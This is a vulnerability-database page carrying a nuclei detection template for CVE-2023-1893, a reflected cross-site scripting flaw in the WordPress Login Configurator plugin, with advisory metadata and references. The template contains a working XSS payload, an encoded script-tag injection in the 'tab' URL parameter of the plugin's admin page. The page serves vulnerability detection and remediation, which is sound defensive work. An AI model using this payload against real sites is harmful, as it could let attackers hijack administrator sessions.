Lucene search
K

Login Configurator <=2.1 - Cross-Site Scripting

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

Login Configurator <=2.1 reflected XSS via unescaped URL param admin session risk; update to latest.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-1893
19 Aug 202511:41
circl
CNNVD
WordPress plugin Login Configurator 跨站脚本漏洞
17 Jul 202300:00
cnnvd
CVE
CVE-2023-1893
17 Jul 202313:29
cve
Cvelist
CVE-2023-1893 Login Configurator <= 2.1 - Reflected Cross-Site Scripting
17 Jul 202313:29
cvelist
EUVD
EUVD-2023-24082
3 Oct 202520:07
euvd
NVD
CVE-2023-1893
17 Jul 202314:15
nvd
OSV
CVE-2023-1893
17 Jul 202314:15
osv
Packet Storm
WordPress Login Configurator 2.1 Cross Site Scripting
25 Jul 202300:00
packetstorm
Prion
Cross site scripting
17 Jul 202314:15
prion
Positive Technologies
PT-2023-17320 · WordPress · Login Configurator
17 Jul 202300:00
ptsecurity
Rows per page
id: CVE-2023-1893

info:
  name: Login Configurator <=2.1 - Cross-Site Scripting
  author: 0xr2r
  severity: medium
  description: |
    Login Configurator WordPress plugin <= 2.1 contains a reflected cross-site scripting caused by improper escaping of URL parameter before outputting it to the page, letting attackers execute scripts in the context of site administrators, exploit requires victim to visit a malicious URL.
  impact: |
    Attackers can execute arbitrary scripts in the context of site administrators, potentially leading to session hijacking or account compromise.
  remediation: |
    Update to the latest version of the plugin where the issue is fixed.
  reference:
    - https://wpscan.com/vulnerability/dbe6cf09-971f-42e9-b744-9339454168c7
    - http://packetstormsecurity.com/files/173723/WordPress-Login-Configurator-2.1-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1893
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-1893
    cwe-id: CWE-79
    epss-score: 0.00673
    epss-percentile: 0.47642
    cpe: cpe:2.3:a:login_configurator_project:login_configurator:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: login_configurator_project
    product: login_configurator
  tags: cve,cve2023,wp,wp-plugin,wordpress,xss,login_configurator,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    host-redirects: true
    max-redirects: 2
    matchers:
      - type: word
        part: body
        words:
          - "login-configurator"
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/options-general.php?page=login-configurator-options&tab=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E#top"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "<script>alert(document.domain)</script>", "login-configurator")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502202632b95cc56745f043ce38c1e1c2eefe4b811710c8769ed076574a871e289c2a022100d5daaff4c42df5764db82fd792937f4aaf9e2314a4b233ad674a33750f5e45a3:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.7Medium risk
Vulners AI Score6.7
CVSS 3.16.1
EPSS0.00673
SSVC
13